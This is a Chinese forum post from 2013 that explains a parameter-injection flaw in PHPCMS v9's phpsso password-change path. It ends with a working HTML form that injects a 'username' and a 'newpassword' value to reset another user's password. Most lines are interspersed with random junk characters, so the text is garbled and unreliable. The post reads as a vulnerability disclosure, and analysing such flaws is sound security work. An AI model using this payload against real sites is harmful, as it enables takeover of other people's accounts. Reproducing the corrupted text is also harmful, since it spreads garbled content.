提到的通行证的代码:
! y+ L* B3 P1 ~9 s
! p: @% k# r" g" z0 C
, A3 q4 w$ _$ { r s/ Bparse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
, a8 Z% P, A! b- z+ K7 B" ^9 u6 P$ h, n7 w
在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
9 V7 b4 a7 C: l2 O8 H/ u% ^% E( K
! p( n$ y4 ]6 {+ X( ~9 G7 K2 I我把它留给了你们。
+ t5 v# w( a4 n& U0 b不知道你们发现了它没有。
' D: A: ?2 y) l/ X" a9 G) C4 Z
3 b: z" ?# y4 E- O+ p, x& _1 a) {我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。. j- B0 `6 \' Z: H2 t2 x
M' |) D3 o" E0 @8 l2 U所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。9 }$ j3 i2 r7 p7 h. v% ?$ @
4 C7 N' C1 C7 _5 n/ h, q' r也就是
4 D! W8 G/ E% s5 H2 C, x
/ X( O! ]# U3 y" U1 }username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。& \2 ~- T# e; }+ n4 [! m
" Y# Y2 y+ g! w要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。
* R. K% l: Y6 x: ?' B9 t/ v/ X' \# K5 m ^5 A, ~& r ]. ~, F2 t
; ?: x: _7 \6 f0 o$ ?: [' \; A! b
其实我们有这样的机会,看看代码,如下: k+ r( {7 V7 V0 ]" _5 t, H4 r
/ |& T) Q% P/ j5 U( p/ T0 Z0 G$ s. b
public function auth_data($data) {
' P* @! O0 |2 [0 i' w8 i, A $s = $sep = '';: t! i! s$ N! {( p9 H; s
foreach($data as $k => $v) {
2 @: k1 p6 N/ V3 R, Q. h6 E if(is_array($v)) {# t8 R3 z4 c+ e( f. u5 e( Y
$s2 = $sep2 = '';
- c6 e0 T: I1 I6 l foreach($v as $k2 => $v2) {- n6 N/ {# a; G, K* @7 @2 y
$s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);+ m5 w+ E+ F( f
$sep2 = '&';
, Y4 U' [# Z" `3 C E$ r' z1 @ }: J5 V# ^/ {3 s4 V3 [3 q2 ]
$s .= $sep.$s2;
# m8 i) `8 {. m' E0 K } else {- f5 ~: A( [. g+ ~! p" G
$s .= "$sep$k=".$this->_ps_stripslashes($v);6 j3 G/ c. X w( g7 d9 M
}/ U. h% W8 L v* V+ X
$sep = '&';! I, h) v7 O9 @& O) l1 t" w( l
}, O+ |( D: t5 |& e( X |
4 A/ {" @1 K" C$ m: R# K $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
$ X9 h' d: D- D+ D4 W' F2 N/ O3 p0 \ return $auth_s;
9 T, j8 d8 Q! a+ c; e- H( _ }
* }0 P+ L! J( Q1 r$ M8 }! l: A, g
可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。
2 y4 W0 B6 e- y% U$ @8 N3 Y) I$ I( d; J( k+ p) u, j5 ?8 n5 H
举个例子( W7 T: r' a) s/ r
! z. Z, E5 }% p/ S" t1 B
$a[aaa=a&bbb] = 'a';
) L D2 x. q, N4 t: x+ P( S5 C* \& h2 T* B
会变成aaa=a&bbb=a
- T1 {# I$ H1 E8 |& o
' k v0 o. h1 v9 `明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。
' u, w, h' Y. H: p" M% ?# k5 A) T9 B1 }
这个时候,我们可以再去看一个函数。, f: f+ l9 N6 T8 s1 J& \
* S i3 S; S4 \7 B* K s
就在这个文件内:
# T% x+ v' l" Q$ b1 R* s
. y% |3 g9 B' ?3 O# p3 I( P2 `7 ^# A; t2 G$ [
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
* U, m, e8 p: C( V8 Z if($email && !$this->_is_email($email)) {$ J; u7 a1 V V) @+ B
return -4;
+ Z( Q( r7 X' M% I }
0 h$ N" V6 y9 r* v7 I/ W return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
% m* ^; R" S( K }' ]4 W! l; p2 J b
, R+ G2 e: a3 m# D
这是向通行证发了这样一个请求。2 M+ |/ o( ?; ]8 H/ q
2 s; ^& ^6 ^+ g- p0 q. w我们再跟到通信证代码里去看看,就会有所发现。& ?6 n# m: o$ X: n
# p4 D L- _; ]& i; ^4 I( w
" k& G6 }4 [+ c! E$ epublic function edit() {
2 E( ~3 F V/ m! K! t//能省就省,太长了不是吗?
$ r' h! u* q5 `1 [ y8 N
( C* [0 c; S" A9 P& @/ ^% \) jif($this->username) {
0 `% \7 y4 v: M6 a0 F0 f//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。( v9 d2 p$ N! v* }" K" ~* s
$res = $this->db->update($data, array('username'=>$this->username)); m$ ~3 q O$ t: ?( W
} else {
9 q% @% y; ^* W* X% m file_put_contents('typeb.txt',print_r($data,1).$this->uid);
3 M5 {1 X3 [5 ?9 G; l! n $res = $this->db->update($data, array('uid'=>$this->uid));( G3 S, a+ _! V3 N6 v6 j! v, N
}
) c1 U( e! l' B( X
+ u) B+ b9 I6 f& C# x0 G/ O, k好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:# ?8 q7 z, F& v u
+ T( D6 Y) j! A7 u! ?/ S3 E
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')" e s' e3 H# U- ?
+ d; D' K# f0 D' p' {, M: f很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。
0 M) X* d7 X/ Z" p
) w9 G1 q& ]4 b5 d4 _我当然找到了:
9 @$ y7 S- O! B8 Y) h0 B/ T# h1 O& \phpcms9/phpcms/modules/member/index.php
4 ?& ~8 l8 |2 h* ~; ^5 l# _
2 J0 t: |* L7 x! l8 h$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
5 s) e1 f; z% `, R/ ^% M. x& J7 d3 }
然后就没有然后了。& Z, x1 x: n' X/ Z
; \4 R% G" E# ^: u, y<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">, b1 `: q# b) K2 l) u. K
<table width="100%" cellspacing="0" class="table_form">
* w0 s5 C3 M* F& m% ^! F+ p- v. n; Q <tr>
9 I X2 s/ V- @ c6 q+ C <th width="80">邮箱:</th> $ t' u+ K: W/ h$ R% V' r3 G
<td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
; o& B* A* u$ r/ E6 I# k5 G </tr>& }! h! c/ e: E. c# G
<tr>
: N/ C) s! h$ z <th width="80">原密码:</th>
, j+ X5 S4 N. @9 g <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>4 q! \- n& x! W4 u3 @+ {
</tr>
4 \% j) }& m$ y! Y# ?0 W <tr>: N, N* H, `% ~. d! W, } W
<th>新密码:</th>5 q7 a" a8 a& i% A6 ^7 K
<td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
! {# {2 M" e1 ^1 o* k </tr>
! K2 i/ Y9 d: d' [/ W$ e" D2 \ <th></th>- S$ a& E% O# B; J) a, q7 ^# A
<td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
6 R+ \5 j5 k5 e& u </tr>
/ n: V" P+ [- ^ D9 n: p+ u' l </table>$ Q) m6 g D3 Q0 m5 R
. x" A+ X* \3 s6 m
m0 U, Y1 E% Z: f; j </form>" B; c: U3 z( O
|
发表于 2013-2-23 14:46:35
收藏
支持
反对